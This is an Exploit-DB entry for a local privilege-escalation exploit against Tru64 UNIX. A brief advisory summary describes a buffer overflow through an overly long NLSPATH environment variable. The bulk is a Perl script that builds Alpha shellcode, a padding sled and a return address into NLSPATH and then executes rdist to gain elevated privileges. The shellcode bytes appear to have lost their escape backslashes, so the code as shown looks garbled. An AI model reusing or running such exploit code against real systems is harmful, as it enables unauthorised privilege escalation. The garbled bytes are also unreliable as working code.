https://www.exploit-db.com/exploits/21773

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/5647/info
 
Tru64 is a commercially available UNIX operating system. Tru64 was originally developed by Digital and is now distributed and maintained by HP.
 
A buffer overflow has been discovered in a number of Tru64 binaries. Attackers may exploit this via an overly long value for the NLSPATH environment variable. Because of this flaw, a local attacker may be able to execute arbitrary instructions. As a result, the attacker may be able to execute malicious code and elevate privileges. 

#!/usr/bin/perl -w
#
# based on work by stripey from back in the day
# kf_lists[at]digitalmunition[dot]com
#
# http://www.digitalmunition.com

$sc .= "x30x15xd9x43x11x74xf0x47x12x14x02x42";
$sc .= "xfcxffx32xb2x12x94x09x42xfcxffx32xb2";
$sc .= "xffx47x3fx26x1fx04x31x22xfcxffx30xb2";
$sc .= "xf7xffx1fxd2x10x04xffx47x11x14xe3x43";
$sc .= "x20x35x20x42xffxffxffxffx30x15xd9x43";
$sc .= "x31x15xd8x43x12x04xffx47x40xffx1exb6";
$sc .= "x48xffxfexb7x98xffx7fx26xd0x8cx73x22";
$sc .= "x13x05xf3x47x3cxffx7exb2x69x6ex7fx26";
$sc .= "x2fx62x73x22x38xffx7exb2x13x94xe7x43";
$sc .= "x20x35x60x42xffxffxffxff";

print "Shellcode is " . length($sc) . " bytes long n";

$tlen = (1024-(length($sc)))/4;

$ENV{"NLSPATH"} = "";
system("ulimit -c 10000");
# 0x14001019a Compaq Tru64 UNIX V5.0 (Rev. 910) (TruNastyWhore.localdomain) 
$ret = "x9ax01x01x40x01";
$ENV{"NLSPATH"}= pack("l",0x47ff041f) x ($tlen) . $sc . $ret;
exec("/usr/bin/rdist -c DMr0x");